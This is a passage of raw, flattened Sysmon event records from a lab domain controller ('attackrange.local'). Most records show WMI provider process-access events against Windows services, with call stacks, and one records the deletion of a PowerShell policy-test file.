ystem32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-BCAA-00000000AD01}9400C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-BCAA-00000000AD01}9400C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6DAB-603E-BCAA-00000000AD01}94005532C:\Windows\system32\conhost.exe{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.404{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0optejxb.4kt.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 